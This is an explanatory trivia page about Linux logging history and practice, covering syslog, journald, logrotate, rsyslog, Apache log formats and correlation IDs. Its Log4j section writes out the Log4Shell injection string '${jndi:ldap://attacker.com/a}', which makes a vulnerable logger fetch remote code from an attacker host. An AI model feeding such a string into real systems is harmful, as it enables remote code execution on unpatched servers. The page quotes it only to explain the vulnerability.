Linux Logging — Trivia & Interesting Facts¶

Surprising, historical, and little-known facts about Linux logging.

syslog was written in the 1980s as part of the sendmail project¶

Eric Allman created syslog in the early 1980s as the logging mechanism for sendmail. It was later adopted as the standard Unix logging interface and formalized as RFC 3164 (BSD syslog) in 2001 and RFC 5424 (modern syslog protocol) in 2009. The facility/severity model (kern.err, auth.info, etc.) has remained essentially unchanged for over 40 years.

The journald binary log format was one of systemd's most controversial changes¶

When systemd introduced journald with structured binary logs, it sparked fierce debate. Critics argued that binary logs were harder to inspect when the system was broken (exactly when you need logs most). Proponents countered that structured logs with indexed fields, automatic rotation, and forward-secure sealing were worth the tradeoff. Most distributions now run both journald and a syslog daemon side by side.

The wtmp file records every login and logout event, and its format dates back to early Unix. The last command reads wtmp to show login history. A companion file, btmp, records failed login attempts. Both use a fixed-size binary record format that has remained compatible across decades, though the record size varies between 32-bit and 64-bit systems.

Linux log rotation was invented because disks used to fill up constantly¶

logrotate, written by Erik Troan at Red Hat in the late 1990s, solves the problem of logs growing without bound. It compresses, rotates, and eventually deletes old log files based on age or size. The tool runs via cron (or a systemd timer) and uses a state file to track when each log was last rotated. Without it, /var/log filling a partition was one of the most common Linux outages.

The kernel ring buffer loses messages when it wraps around¶

The kernel's dmesg buffer is a fixed-size circular buffer (configurable via log_buf_len kernel parameter, default 256 KB). When it fills up, old messages are silently overwritten. On systems generating heavy kernel messages (frequent USB events, noisy drivers), early boot messages can vanish before any daemon reads them. journald's kmsg reader mitigates this by consuming messages in real time.

rsyslog can process over one million messages per second¶

rsyslog, the default syslog implementation on most Linux distributions since the late 2000s, was rewritten with a multi-threaded architecture that can sustain over one million log messages per second. It supports output to files, databases (MySQL, PostgreSQL), Elasticsearch, Kafka, and remote syslog servers. Its configuration syntax, while powerful, is notoriously difficult to read.

Structured logging with JSON solved the parsing problem¶

Traditional syslog messages are unstructured text, requiring fragile regex parsing to extract fields. The shift to structured logging (JSON lines, key-value pairs) in the 2010s made logs machine-parseable. Tools like journald, Fluentd, and application frameworks (Python's structlog, Go's zerolog) produce logs where each field is queryable without regex.

The auth.log file is the first place to check after a security incident¶

On Debian-based systems, /var/log/auth.log (RHEL uses /var/log/secure) records every authentication event: SSH logins, sudo commands, su usage, PAM failures, and key-based auth. During incident response, this file — combined with journalctl _TRANSPORT=audit — provides the timeline of who accessed the system and what they did.

Log forwarding over UDP can silently lose messages¶

Traditional syslog forwarding uses UDP port 514 by default. UDP provides no delivery guarantee, no congestion control, and no acknowledgment. Under load, the receiving syslog server (or any intermediate network device) can silently drop messages. This is why modern log pipelines use TCP-based transport (RELP, TCP syslog) or message brokers like Kafka for reliable delivery.

journalctl can correlate logs across all services by boot ID¶

journald assigns a unique boot ID to each system boot. Running journalctl --list-boots shows all recorded boots, and journalctl -b -1 shows logs from the previous boot. This boot-aware correlation is invaluable for diagnosing why a system rebooted — you can see the last messages before the crash without manually cross-referencing timestamps.

Ships historically measured speed by throwing a wooden log overboard and timing how long the rope took to pay out. The record of these measurements was kept in the "log book." Computer logging inherited the term — a sequential record of events, ordered by time, for later analysis. The nautical term dates back to at least the 16th century.

The Apache web server's Combined Log Format has been unchanged since 1995¶

Apache's Combined Log Format (CLF), which adds Referer and User-Agent to the Common Log Format, has remained essentially unchanged for 30 years. Nearly every web server, load balancer, and CDN supports it. This single log format has probably been parsed by more scripts and tools than any other format in computing history.

Log4j is in 70% of Java applications and its vulnerability affected the entire internet¶

Apache Log4j is used in approximately 70% of Java applications. When CVE-2021-44228 (Log4Shell) was disclosed in December 2021, it affected an estimated 3 billion devices. The vulnerability allowed remote code execution through a simple log message like ${jndi:ldap://attacker.com/a}. It was rated 10.0/10.0 on the CVSS scale — the maximum possible severity.

printf debugging is the most common debugging technique despite decades of tool development¶

Despite sophisticated debuggers, profilers, and tracing systems, surveys consistently show that the most common debugging technique is adding print/log statements to code. A 2019 JetBrains survey found that over 60% of developers use print/log statements as their primary debugging method. Linus Torvalds has publicly stated that he debugs the Linux kernel primarily through printk statements.

The twelve-factor app methodology says logs should go to stdout, not files¶

The Twelve-Factor App methodology (2012) controversially argued that applications should never manage their own log files — they should write unbuffered to stdout, and the execution environment should handle collection and routing. This principle was considered radical at the time but became standard practice in containerized environments where writing to local files is often impossible.

Correlation IDs were independently invented by dozens of organizations¶

The practice of including a unique request ID (correlation ID, trace ID) in every log message to trace a request across multiple services was independently reinvented by teams at Amazon, Google, Twitter, and many others. Before distributed tracing standards like OpenTelemetry formalized the concept, every organization had its own incompatible format for request correlation.